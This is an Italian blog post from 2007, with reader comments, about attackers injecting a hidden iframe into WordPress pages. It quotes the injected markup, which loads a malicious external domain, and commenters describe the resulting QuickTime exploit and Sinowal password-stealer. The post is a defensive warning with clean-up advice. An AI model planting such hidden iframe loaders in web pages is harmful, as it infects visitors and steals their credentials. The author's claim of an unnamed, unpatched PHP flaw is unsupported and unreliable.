Attacchi Hackers anzi Lamers. Spargete la voce.
Scritto da Francesco
A dire la verita’ chiamare uno stupido come questo Hacker significa offendere una categoria della quale ho grande stima.
Anche io per tanto tempo ho studiato le falle di vari sistemi, a cominciare da Internet Explorer, ActiveX e altro.
Quindi chiamiamo questo imbecille per quello che e’, niente piu’ che un Lamer, i cosiddetti Principianti.
Ora gli attacchi di questo stupido Lamer non sono piu’ del tipo DOS, Denial of Service, quindi intentati a buttare giu’ il blog, ma sono dedicati a cercare di inserire linee di codice nelle pagine di Wordpress.
Avevo gia’ letto di tecniche del genere, con blog molto rinomati colpiti da hacker che hanno implementato una strategia simile.
Ma il risultato era molto piu’ intelliggente. L’hacker inseriva un tag Div invisibile con centinaia di link verso i propri siti!
Tecnica meravigliosa per ottenere backlinks, soprattutto quando i blog colpiti erano con un alto PageRank.
Invece il mio stupido Lamer non si ferma a questo, ma va ben oltre!
Ecco una copia del codice che ha inserito:
<div style=”visibility:hidden”><iframe src=”http : // gfeptwe . com/ld/grb/” width=100 height=80></iframe></div></body>
Per scoprire se siete stati colpiti da una tecnica del genere vi bastera’ controllare il sorgente del vostro blog alla ricerca di codice del genere. Utilizzate il Trova, e cercate la parola “hidden” se trovate qualche risoltato assicuratevi che lo avete inserito voi!
Solitamente questo codice viene inserito alla fine del sorgente, diventa quindi ancora piu’ facile individuare del codice maligno.
Fate attenzione, inoltre, perche’ il codice inserito potrebbe crearvi problemi con Google che riconosce il codice e penalizza le pagine nelle sue SERP.
Se trovate questo, o altro codice che non riconoscete, vi bastera’ sovrascrivere il file index.php nella root del vostro blog.
Se avete bisogno di assistenza fatemi sapere sono disponibile a lottare contro questi stupidi Lamer.
hacker lamer
Ecco alcuni articoli che potrebbero interessarti per Guadagnare:
il 9 deve essere fantastico..unica pecca:il...
December 19th, 2007 at 11:34 am
mi dispiace davvero, ma come ha fatto ad inserire il codice nel tuo blog? sfruttando qualche falla di wordpress o del server che ti fa hosting?
December 19th, 2007 at 12:07 pm
secondo me è molto difficile che sia wordpress
December 19th, 2007 at 12:19 pm
Potrei riportare la tecnica, credetemi incredibilmente semplice da attuare, ma sono sicuro che sarebbe un tool troppo allettante, e mi dispiacerebbe vedere il proliferare di queste tecniche.
@Mirko, non e’ un problema di WP, questa tecnica sfrutta una falla di PHP.
Ma non vado oltre!
Francesco
December 19th, 2007 at 12:31 pm
ho fatto una ricerca e mi sà che ho capito a cosa ti riferisci… sono sconcertato
incrociamo le dita..
December 19th, 2007 at 12:58 pm
Occhi aperti!
Francesco
December 20th, 2007 at 12:05 pm
ciao ragazzi è successa anche a me esattamente la stessa cosa sul mio sito. Tolto il codice ieri. Vorrei chiedervi come posso difendere il mio sito da questo tipo di attacchi (vorrei avitare si ripetessero…) e dunque come tappare questa “falla”. Grazie mille
December 20th, 2007 at 2:57 pm
Daniele,
Prima di pubblicare questo articolo ho cercato in rete come difendersi da questo tipo di attacco.
Sembra che non il team di PHP non sembra considerare questa una falla importante e quindi non hanno ancora rilasciato patch per risolvere il problema.
Per questo ho scritto questo articolo, almeno si puo’ fare attenzione e cercare di rimuovere il codice maligno prima che faccia danno!
Francesco
December 20th, 2007 at 3:45 pm
Ciao Francesco,
innanzitutto grazie per la risposta.
Avrei un po di domande da porti, spero avrai la pazienza di illuminarmi, magari insieme riusciamo a trovare una soluzione definitiva (io mi occupo di sviluppo di siti e posizionamento nei motori di ricerca).
1. Come fai a dire che è una falla di php (e non magari un bug di qualche programma stile joomla)?
2. come si chiama?
3. infetta solo la index.php? riescono a “beccarmi” la pass ftp o leggere le pagine di codice?
4. non esiste un metodo per difendersi che nn sia quello di stare continuamente a controllare?
Grazie mille per le risposte, spero riusciremo a risolvere quanto prima, anche perchè mi sembra una cosa abbastanza grave!
p.s. io sono hostato su Aruba
December 20th, 2007 at 4:32 pm
Daniele,
1) come gia’ scritto nell’articolo, e’ una tecnica molto semplice che sfrutta una falla di php per inserire del codice all’interno delle pagine.
2) Non voglio pubblicizzare il nome della tecnica sul blog per evitare una ulteriore diffusione.
Se vuoi contattami via email e ti do le informazioni sul tipo di attacco, ma non servira’ a molto visto che il forum di PHP non ritiene questa una falla importante.
3) Non infetta le pagine, il maleintenzionato della situazione inserisce del codice html nelle tue pagine. Le password non sono direttamente in pericolo con questo attacco, il problema e’ che ho scoperto che chi utilizza questa tecnica puo’ inserire codici html che automaticamente installano spyware attraverso ActiveX, quindi in teoria se il tuo pc e’ stato infettato potrebbero aver scoperto le tue passwords.
4) No, non esiste! Finche’ il forum di PHP non decide di prendere azione.
In teoria questa falla e’ molto ben conosciuta e documentata.
Francesco
December 20th, 2007 at 4:41 pm
Grazie francesco, si ti prego di fornirmi il nome via mail, provvederò a documentarmi.
Grazie
December 21st, 2007 at 4:26 pm
Ciao ragazzi, qualcuno di voi ha subito danni nelle SERP o al PR?
Anch’io hostato su Aruba, ho subito questo attacco e ho rimosso il codice nel giro di 24 ore..ora, da quel giorno ho iniziato a notare un lieve ma costante calo del traffico, finchè oggi la mia homepage (che era a PR 5) è scesa a PR 3, mentre tutte le sottopagine (che avevano PR non nullo) sono andate a 0.
Qualcun altro ha problemi del genere?
December 21st, 2007 at 5:05 pm
Ciao Stefano, no devo dire di non aver subito questo tipo di cali, ne nelle serp ne nel pr. Che software hai installato sul tuo host? Dove credi che sia la falla? Come hai risolto?
December 21st, 2007 at 5:05 pm
Ciao Stefano,
bene il tuo mi sembra un problema più complicato.
L’attacco probabilmente se viene rilevato dallo spider di Google potrebbe aver creato problemi nelle SERP.
A mio parere non dovrebbe avere alcun effetto sul PR.
Sembra che Google stia nel frattempo eseguendo una nuova indicizzazione.
Questo blog ha avuto una enorme diminuzione di traffico proveniente da Google ed anche la perdita delle migliori Keywords dalle SERP.
Ma non ha perduto il PR, almeno fino ad oggi!!!
Per la perdita di PR del tuo blog, la ragione potrebbe essere la vendita di link attraverso Text Link Ads, tu lo utilizzi per caso?
Infatti le perdite di PR registrate ultimamente sono tutte riconducibili alla vendita dei link.
Francesco
December 22nd, 2007 at 3:47 pm
No, non utilizzo Text Link Ads e non vendo link. Una curiosità..il tuo blog è stato vittima di questo attacco?
December 22nd, 2007 at 9:34 pm
<p>Si, mi hanno colpito, diverse volte, fortunatamente me ne sono accorto in tempo e ho sistemato tutto in pochissimo!</p>
December 23rd, 2007 at 2:40 am
Sembra utilizzino l’iframe per reindirizzare ad un url tramite il quale infettare il pc dell’utente con un trojan.
Ho trovato poco in giro, ma sembra che sia vulnerabile chi ha quicktime installato.
Qui ne parlano, e forniscono anche un sistema per pulire il proprio computer, se infetto: http://www.nextrl.it/forum/index.php?s=dbe288a5b618ad45451f1fe7996bc717&act=ST&f=27&t=19155
@Francesco: puoi indicarmi per favore via email di che falla di php si tratta ed eventualmente la pagina del forum php dove se ne parla. Grazie mille
December 23rd, 2007 at 1:33 pm
Se può essere utile, qualche info ulteriore su quello che accade:
- Alcuni siti sono stati violati con iframe che punta a gfeptwe.com
- Da questo sito viene scaricato uno script offuscato che esegue vari exploit a seconda del browser
- Se si usa Firefox esegue un controllo per verificare la presenza di Apple Quicktime e se presente e vulnerabile ne esegue un exploit.
- Il virus scaricato è
AntiVir TR/PWS.Sinowal.Gen
Noman W32/Sinowal.ALH
Sophos Mal/Sinowa-A
Apple consiglia: di aggiornare quicktime alla versione 7.3.1
- http://secunia.com/advisories/28092/
- http://docs.info.apple.com/article.html?artnum=307176
December 26th, 2007 at 7:06 pm
abcreativity misà che hai centrato in pieno
December 29th, 2007 at 2:40 am
Del virus non me ne preoccupo più di molto (sperando solo che non sia compatibile con linux
), ma cerco comunque di tener d’occhio il sorgente, non si sa mai. Comunque, ci sono novità in merito? Quelli di PHP hanno mosso almeno un dito?
December 30th, 2007 at 7:20 pm
[…] con il mio blog: Attacchi Hackers anzi Lamers. Spargete la voce Top 10 dei segnali che stai diventando blog-dipendente Wordpress VS Blogger: dico la mia Angoli […]